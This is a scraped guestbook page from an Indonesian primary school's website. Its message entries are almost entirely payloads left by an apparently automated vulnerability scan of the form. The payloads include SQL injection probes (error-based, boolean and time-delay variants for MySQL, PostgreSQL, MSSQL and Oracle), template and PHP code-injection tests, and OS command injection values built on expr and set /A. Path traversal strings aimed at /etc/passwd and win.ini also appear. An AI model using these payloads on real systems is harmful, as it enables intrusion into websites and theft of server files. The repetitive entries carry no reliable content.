Jumlah Pengunjung: 189
Pengunjung online saat ini: 1
SD Negeri 4 Glempang

SD Negeri 4 Glempang,

Karang Tunon Desa Glempang RT 7 Rw 5

Kec. Mandiraja Kab. Banjarnegara 53473

Pesan Anda

nyambung

admin

123456

vphixhwwmwdvvjiuhbdl

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

vphixhwwmwdvvjiuhbdl

admin

123456

admin

123456

admin

123456

admin

123456/**/and+3=3

admin

123456'and/**/extractvalue(1,concat(char(126),md5(1904017248)))and'

admin

123456/**/and+1=8

admin

123456"and/**/extractvalue(1,concat(char(126),md5(1925110571)))and"

admin

123456'and'p'='p

admin

extractvalue(1,concat(char(126),md5(1699400696)))

admin

123456'and'i'='p

admin

123456'and(select'1'from/**/cast(md5(1666483587)as/**/int))>'0

admin

123456"and"a"="a

admin

123456/**/and/**/cast(md5('1611559913')as/**/int)>0

admin

123456"and"z"="m

admin

123456

admin

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1178247534')))

admin

123456

admin

123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1516780241')))>'0

admin

123456鎈'"\(

admin

123456

admin

123456'"\(

admin

(select*from(select+sleep(0)union/**/select+1)a)

admin'and/**/extractvalue(1,concat(char(126),md5(1606326795)))and'

123456

admin

(select*from(select+sleep(2)union/**/select+1)a)

admin"and/**/extractvalue(1,concat(char(126),md5(1420767977)))and"

123456

admin

123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='

extractvalue(1,concat(char(126),md5(1106976777)))

123456

admin'and(select'1'from/**/cast(md5(1246991133)as/**/int))>'0

123456

admin

123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='

admin/**/and/**/cast(md5('1317881788')as/**/int)>0

123456

admin

123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1058539979')))

123456

admin

123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="

admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1834987035')))>'0

123456

admin

123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/

admin鎈'"\(

123456

admin

123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/

admin'"\(

123456

admin

123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0

admin

123456

admin

123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0

admin

123456

admin

123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/

admin

123456

admin

123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/

admin

123456

admin

123456'and(select+1)>0waitfor/**/delay'0:0:0

admin

123456

admin

123456'and(select+1)>0waitfor/**/delay'0:0:2

admin

123456

admin

123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('e',0)

admin

123456

admin

123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('s',2)

admin

123456

admin

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('s',0)='s

admin

123456

admin

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('n',2)='n

admin'and'u'='u

123456

admin'and'p'='w

123456

admin"and"s"="s

123456

admin"and"y"="r

123456

admin'and(select*from(select+sleep(0))a/**/union/**/select+1)='

123456

admin'and(select*from(select+sleep(2))a/**/union/**/select+1)='

123456

admin"and(select*from(select+sleep(0))a/**/union/**/select+1)="

123456

admin"and(select*from(select+sleep(2))a/**/union/**/select+1)="

123456

admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0

123456

admin'/**/and(select'1'from/**/pg_sleep(2))::text>'0

123456

admin'and(select+1)>0waitfor/**/delay'0:0:0

123456

admin'and(select+1)>0waitfor/**/delay'0:0:2

123456

admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('m',0)='m

123456

admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('t',2)='t

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456/**/and+2=2

admin'and/**/extractvalue(1,concat(char(126),md5(1905025821)))and'

123456

admin

123456/**/and+4=7

admin"and/**/extractvalue(1,concat(char(126),md5(1957678940)))and"

123456

admin

123456'and'r'='r

extractvalue(1,concat(char(126),md5(1547701734)))

123456

admin

123456'and'u'='y

admin'and(select'1'from/**/cast(md5(1076665953)as/**/int))>'0

123456

admin

123456"and"i"="i

admin/**/and/**/cast(md5('1204787253')as/**/int)>0

123456

admin

123456"and"o"="w

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1378200476')))

123456

admin

123456

admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1060645343')))>'0

123456

admin

123456

admin鎈'"\(

123456

admin

123456

admin'"\(

123456

admin

(select*from(select+sleep(0)union/**/select+1)a)

admin

123456

admin

(select*from(select+sleep(2)union/**/select+1)a)

admin

123456

admin

123456

admin

123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='

admin

123456

admin

123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='

admin

123456

admin

123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="

admin

123456

admin

123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="

admin

123456

admin

123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/

admin

123456

admin

123456

admin

123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/

admin

123456'and/**/extractvalue(1,concat(char(126),md5(1239022563)))and'

admin

123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0

admin

123456"and/**/extractvalue(1,concat(char(126),md5(1655893382)))and"

admin

123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0

admin

extractvalue(1,concat(char(126),md5(1243416073)))

admin

123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/

admin

123456'and(select'1'from/**/cast(md5(1694535537)as/**/int))>'0

admin

123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/

admin

123456/**/and/**/cast(md5('1667953431')as/**/int)>0

admin

123456'and(select+1)>0waitfor/**/delay'0:0:0

admin

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1100302633')))

admin

123456'and(select+1)>0waitfor/**/delay'0:0:2

admin

123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1428722536')))>'0

admin

123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('g',0)

admin

123456鎈'"\(

admin

123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('g',2)

admin

123456'"\(

admin

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',0)='z

admin

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',2)='z

admin'and'z'='z

123456

admin'and'r'='o

123456

admin"and"y"="y

123456

admin"and"w"="n

123456

admin'and(select*from(select+sleep(0))a/**/union/**/select+1)='

123456

admin'and(select*from(select+sleep(2))a/**/union/**/select+1)='

123456

admin"and(select*from(select+sleep(0))a/**/union/**/select+1)="

123456

admin"and(select*from(select+sleep(2))a/**/union/**/select+1)="

123456

admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0

123456

admin'/**/and(select'1'from/**/pg_sleep(2))::text>'0

123456

admin'and(select+1)>0waitfor/**/delay'0:0:0

123456

admin'and(select+1)>0waitfor/**/delay'0:0:2

123456

admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('z',0)='z

123456

admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('y',2)='y

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin'and'e'='e

123456

admin'and/**/extractvalue(1,concat(char(126),md5(1352217466)))and'

123456

admin'and'y'='l

123456

admin"and/**/extractvalue(1,concat(char(126),md5(1366225275)))and"

123456

extractvalue(1,concat(char(126),md5(1234881857)))

123456

admin"and"x"="x

123456

admin'and(select'1'from/**/cast(md5(1724925626)as/**/int))>'0

123456

admin"and"o"="k

123456

admin/**/and/**/cast(md5('1626136008')as/**/int)>0

123456

admin

123456

admin

123456

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1930629392')))

123456

admin

123456

admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1959254208')))>'0

123456

admin'and(select*from(select+sleep(0))a/**/union/**/select+1)='

123456

admin鎈'"\(

123456

admin'and(select*from(select+sleep(2))a/**/union/**/select+1)='

123456

admin'"\(

123456

admin"and(select*from(select+sleep(0))a/**/union/**/select+1)="

123456

admin

123456

admin"and(select*from(select+sleep(2))a/**/union/**/select+1)="

123456

admin

123456

admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0

123456

admin

123456

admin'/**/and(select'1'from/**/pg_sleep(2))::text>'0

123456

admin

123456

admin'and(select+1)>0waitfor/**/delay'0:0:0

123456

admin

123456

admin'and(select+1)>0waitfor/**/delay'0:0:2

123456

admin

123456

admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('f',0)='f

123456

admin

123456

admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('f',2)='f

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456'and/**/extractvalue(1,concat(char(126),md5(1771710281)))and'

admin

123456

admin

123456"and/**/extractvalue(1,concat(char(126),md5(1340501784)))and"

admin

123456

admin

extractvalue(1,concat(char(126),md5(1047724694)))

admin

123456

admin

123456'and(select'1'from/**/cast(md5(1258208589)as/**/int))>'0

admin

123456

admin

123456/**/and/**/cast(md5('1227484117')as/**/int)>0

admin

123456

admin

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1276497654')))

admin

123456

admin

123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1009721376')))>'0

admin

123456

admin

123456鎈'"\(

admin

123456

admin

123456'"\(

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456/**/and+4=4

admin

123456/**/and+3=8

admin

123456'and's'='s

admin

123456'and'y'='f

admin

123456"and"a"="a

admin

123456"and"i"="g

admin

(select*from(select+sleep(0)union/**/select+1)a)

admin

(select*from(select+sleep(2)union/**/select+1)a)

admin

123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='

admin

123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='

admin

123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="

admin

123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="

admin

123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/

admin

123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/

admin

123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0

admin

123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0

admin

123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/

admin

123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/

admin

123456'and(select+1)>0waitfor/**/delay'0:0:0

admin

123456'and(select+1)>0waitfor/**/delay'0:0:2

admin

123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('d',0)

admin

123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('a',2)

admin

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',0)='l

admin

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('c',2)='c

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin'and/**/extractvalue(1,concat(char(126),md5(1406948643)))and'

123456

admin

123456

admin

123456

admin"and/**/extractvalue(1,concat(char(126),md5(1398860731)))and"

123456

extractvalue(1,concat(char(126),md5(1180980177)))

123456

admin

123456/**/and+4=4

admin'and(select'1'from/**/cast(md5(1554089012)as/**/int))>'0

123456

admin

123456/**/and+4=9

admin/**/and/**/cast(md5('1589576840')as/**/int)>0

123456

admin

123456'and'q'='q

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1765131694')))

123456

admin

123456'and'q'='w

admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1575035365')))>'0

123456

admin

123456"and"w"="w

admin

123456"and"u"="t

admin鎈'"\(

123456

admin

123456

admin'"\(

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

(select*from(select+sleep(0)union/**/select+1)a)

admin

123456

admin

(select*from(select+sleep(2)union/**/select+1)a)

admin

123456

admin

123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='

admin

123456

admin

123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='

admin

123456

admin

123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="

admin

123456

admin

123456

admin

123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="

admin

123456

admin

123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/

admin

123456'and/**/extractvalue(1,concat(char(126),md5(1126459919)))and'

admin

123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/

admin

123456"and/**/extractvalue(1,concat(char(126),md5(1733442008)))and"

admin

123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0

admin

extractvalue(1,concat(char(126),md5(1380280127)))

admin

123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0

admin

123456'and(select'1'from/**/cast(md5(1168828869)as/**/int))>'0

admin

123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/

admin

123456/**/and/**/cast(md5('1286729322')as/**/int)>0

admin

123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/

admin

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1522398091')))

admin

123456'and(select+1)>0waitfor/**/delay'0:0:0

admin

123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1015448192')))>'0

admin

123456鎈'"\(

admin

123456'and(select+1)>0waitfor/**/delay'0:0:2

admin

123456'"\(

admin

123456/**/and/**/2=DBMS_PIPE.RECEIVE_MESSAGE('q',0)

admin

123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('a',2)

admin

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('c',0)='c

admin

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('v',2)='v

admin'and'g'='g

123456

admin'and'u'='r

123456

admin"and"n"="n

123456

admin"and"e"="c

123456

admin'and(select*from(select+sleep(0))a/**/union/**/select+1)='

123456

admin'and(select*from(select+sleep(2))a/**/union/**/select+1)='

123456

admin"and(select*from(select+sleep(0))a/**/union/**/select+1)="

123456

admin"and(select*from(select+sleep(2))a/**/union/**/select+1)="

123456

admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0

123456

admin'/**/and(select'1'from/**/pg_sleep(2))::text>'0

123456

admin'and(select+1)>0waitfor/**/delay'0:0:0

123456

admin'and(select+1)>0waitfor/**/delay'0:0:2

123456

admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('b',0)='b

123456

admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('l',2)='l

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

/*1*/{{997216533+858017495}}

admin

${925624771+896014799}

admin

${@var_dump(md5(605311119))};

admin

123456

admin

123456

admin

'-var_dump(md5(623047693))-'

admin

${976257920+906940645}

${965473623+922664486}

123456

admin

123456

admin

123456

admin

123456

${@var_dump(md5(413127036))};

123456

admin

123456

admin

123456

admin

${(983130816+947912231)?c}

admin

123456

admin

123456

'-var_dump(md5(849399401))-'

123456

admin

#set($c=915559644+892609796)${c}$c

admin

123456/**/and+1=1

admin

123456

admin

123456

admin

123456

admin

<%- 828596253+996147408 %>

admin

123456/**/and+3=9

admin

123456

admin

123456

admin

123456

/*1*/{{844964285+919741179}}

123456

admin

123456

admin

123456'and'u'='u

admin

123456 expr 870379548 + 890322332

${956662682+827796817}

123456

admin

123456'and'b'='a

admin

123456

${(870705517+800491449)?c}

123456

admin

123456|expr 858291883 + 974660231

admin

123456$(expr 980165379 + 943799298)

admin

123456"and"z"="z

#set($c=800583908+984481338)${c}$c

123456

admin

123456

admin

123456&set /A 905867857+993121728

admin

123456"and"x"="r

<%- 908480426+877091580 %>

123456

admin

123456

admin

expr 804298105 + 939397513

admin

123456

admin

123456

admin

123456

admin

123456

admin expr 834891113 + 894425033

123456

admin

123456

admin|expr 877298769 + 909167713

123456

admin

123456

admin

123456

admin

123456

admin

(select*from(select+sleep(0)union/**/select+1)a)

admin

123456

admin$(expr 813595042 + 861506297)

123456

admin&set /A 842183722+891855890

123456

admin

(select*from(select+sleep(2)union/**/select+1)a)

admin

123456'and/**/extractvalue(1,concat(char(126),md5(1991638350)))and'

admin

123456

expr 875421813 + 950869402

123456

admin

123456

admin

123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='

admin

123456"and/**/extractvalue(1,concat(char(126),md5(1570261534)))and"

admin

123456'and(select*from(select+sleep(2))a/**/union/**/select+1)='

admin

extractvalue(1,concat(char(126),md5(1574836715)))

admin

123456'and(select'1'from/**/cast(md5(1399206745)as/**/int))>'0

admin

123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="

admin

123456/**/and/**/cast(md5('1865808546')as/**/int)>0

admin

123456"and(select*from(select+sleep(2))a/**/union/**/select+1)="

admin

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1934672217')))

admin

123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/

admin

123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1808385792')))>'0

admin

123456/**/and(select+1/**/from/**/pg_sleep(2))>0/**/

admin

123456鎈'"\(

admin

123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0

admin

123456'"\(

admin

123456'/**/and(select'1'from/**/pg_sleep(2))::text>'0

admin'and/**/extractvalue(1,concat(char(126),md5(1494745201)))and'

123456

admin

123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/

admin"and/**/extractvalue(1,concat(char(126),md5(1384607831)))and"

123456

admin

123456/**/and(select+1)>0waitfor/**/delay'0:0:2'/**/

extractvalue(1,concat(char(126),md5(1609750954)))

123456

admin

123456'and(select+1)>0waitfor/**/delay'0:0:0

admin'and(select'1'from/**/cast(md5(1013078855)as/**/int))>'0

123456

admin

123456'and(select+1)>0waitfor/**/delay'0:0:2

admin/**/and/**/cast(md5('1007453349')as/**/int)>0

123456

admin

123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('y',0)

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1052973438')))

123456

admin

123456/**/and/**/0=DBMS_PIPE.RECEIVE_MESSAGE('x',2)

admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1920795099')))>'0

123456

admin

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('r',0)='r

admin鎈'"\(

123456

admin

123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('n',2)='n

admin'and'r'='r

123456

admin'"\(

123456

admin'and'z'='a

123456

admin"and"d"="d

123456

admin"and"d"="s

123456

admin'and(select*from(select+sleep(0))a/**/union/**/select+1)='

123456

admin'and(select*from(select+sleep(2))a/**/union/**/select+1)='

123456

admin"and(select*from(select+sleep(0))a/**/union/**/select+1)="

123456

admin"and(select*from(select+sleep(2))a/**/union/**/select+1)="

123456

admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0

123456

admin'/**/and(select'1'from/**/pg_sleep(2))::text>'0

123456

admin'and(select+1)>0waitfor/**/delay'0:0:0

123456

admin'and(select+1)>0waitfor/**/delay'0:0:2

123456

admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('t',0)='t

123456

admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('y',2)='y

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

${936938615+905156093}

123456

../../../../../../../../../../../../../../../../../../etc/passwd

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

admin

123456

../../../../../../../../../../../../../../../../../../etc/passwdadmin

123456

admin

123456

admin

123456

admin

123456

admin

123456

./../../../../../../../../../../../../../../../../../../etc/passwd

123456

admin

${852014296+832170570}

admin

123456

admin

123456

admin

123456

admin

${@var_dump(md5(863066369))};

admin

123456

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%

123456

admin

123456

admin

'-var_dump(md5(533489215))-'

admin

123456

admin

123456

admin'and'w'='w

123456

admin

123456

admin

123456

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00

123456

admin

123456

${@var_dump(md5(993656527))};

123456

admin'and'f'='n

123456

admin

123456 expr 807002995 + 865812906

../../../../../../etc/passwd

123456

'-var_dump(md5(946455955))-'

123456

admin

123456

admin

/*1*/{{929446245+917033079}}

admin"and"i"="i

123456

admin

123456|expr 854239379 + 979500871

../../../../../../etc/passwdadmin

123456

admin

123456

admin

${901941583+863945821}

admin"and"m"="n

123456

admin

123456

admin

123456$(expr 961074168 + 833368462)

admin

${(852420447+871609025)?c}

admin

123456

./../../../../../../etc/passwd

123456

admin

123456&set /A 969649792+914588070

admin

123456

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

123456

admin

123456

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00

123456

admin

#set($c=946673909+814052753)${c}$c

admin

123456

admin

expr 890023310 + 959988734

admin

123456

admin

<%- 982673512+804002785 %>

/etc/passwd

123456

admin

123456

admin expr 893827669 + 945413793

123456

admin'and(select*from(select+sleep(0))a/**/union/**/select+1)='

123456

/*1*/{{837623457+886488325}}

123456

/etc/passwdadmin

123456

admin'and(select*from(select+sleep(2))a/**/union/**/select+1)='

123456

admin

123456

admin|expr 819474748 + 874740903

123456

${988551070+885544191}

123456

%2fetc%2fpasswd

123456

admin$(expr 992511424 + 827209143)

123456

admin"and(select*from(select+sleep(0))a/**/union/**/select+1)="

123456

%u2215etc%u2215passwd

123456

admin

123456

${(801860415+985699599)?c}

123456

admin"and(select*from(select+sleep(2))a/**/union/**/select+1)="

123456

admin&set /A 950164416+901893745

123456

admin

123456'and/**/extractvalue(1,concat(char(126),md5(1669883623)))and'

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini

123456

#set($c=975095735+816777108)${c}$c

123456

expr 959137017 + 928812225

123456

admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0

123456

admin

123456"and/**/extractvalue(1,concat(char(126),md5(1513313810)))and"

.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini

123456

<%- 879719532+886479616 %>

123456

admin'/**/and(select'1'from/**/pg_sleep(2))::text>'0

123456

admin

extractvalue(1,concat(char(126),md5(1562834601)))

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.iniadmin

123456

admin

123456'and(select'1'from/**/cast(md5(1661298737)as/**/int))>'0

admin'and(select+1)>0waitfor/**/delay'0:0:0

123456

admin'and(select+1)>0waitfor/**/delay'0:0:2

123456

admin

123456/**/and/**/cast(md5('1418152429')as/**/int)>0

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%

123456

admin

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1163740806')))

admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('u',0)='u

123456

%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00

123456

admin

123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1548829643')))>'0

admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('g',2)='g

123456

..\..\..\..\..\..\windows/win.ini

123456

admin

123456鎈'"\(

admin

123456'"\(

admin

123456

.\..\..\..\..\..\..\windows/win.ini

123456

admin

123456

admin'and/**/extractvalue(1,concat(char(126),md5(1259300256)))and'

123456

..\..\..\..\..\..\windows/win.iniadmin

123456

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini

123456

admin

123456

admin"and/**/extractvalue(1,concat(char(126),md5(1756926558)))and"

123456

%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00

123456

admin

123456

extractvalue(1,concat(char(126),md5(1145256078)))

123456

../../../../../../../../../../../../../../../../../../windows/win.ini

123456

admin

123456

admin'and(select'1'from/**/cast(md5(1960532759)as/**/int))>'0

123456

./../../../../../../../../../../../../../../../../../../windows/win.ini

123456

admin

123456

admin/**/and/**/cast(md5('1436095698')as/**/int)>0

123456

../../../../../../../../../../../../../../../../../../windows/win.iniadmin

123456

convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1613601463')))

123456

admin

123456

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%

123456

admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1482457120')))>'0

123456

admin

123456

admin鎈'"\(

123456

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00

123456

admin

123456

../../../../../../windows/win.ini

123456

admin'"\(

123456

admin

123456

admin

123456

./../../../../../../windows/win.ini

123456

../../../../../../windows/win.iniadmin

123456

admin

123456

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini

123456

admin

123456

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00

123456

admin

123456

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini

123456

admin

123456

admin

123456

.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.ini

123456

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows/win.iniadmin

123456

admin

123456

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%

123456

admin

123456

%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00

123456

admin

123456

..\..\..\..\..\..\windows/win.ini

123456

admin

123456

.\..\..\..\..\..\..\windows/win.ini

123456

admin

123456

..\..\..\..\..\..\windows/win.iniadmin

123456

admin

123456

%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows/win%2eini

123456

admin

123456

%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u00

123456

admin

123456

../../../../../../../../../../../../../../../../../../windows/win.ini

123456

admin

123456/**/and+0=0

./../../../../../../../../../../../../../../../../../../windows/win.ini

123456

../../../../../../../../../../../../../../../../../../windows/win.iniadmin

123456

admin

123456/**/and+0=6

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%

123456

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00

123456

admin

123456'and'f'='f

../../../../../../windows/win.ini

123456

./../../../../../../windows/win.ini

123456

admin

123456'and'h'='k

../../../../../../windows/win.iniadmin

123456

admin

123456"and"b"="b

%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fwindows%2fwin%2eini

123456

admin

123456"and"s"="u

%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u00

123456

..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini

123456

admin

(select*from(select+sleep(0)union/**/select+1)a)

.\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini

123456

admin

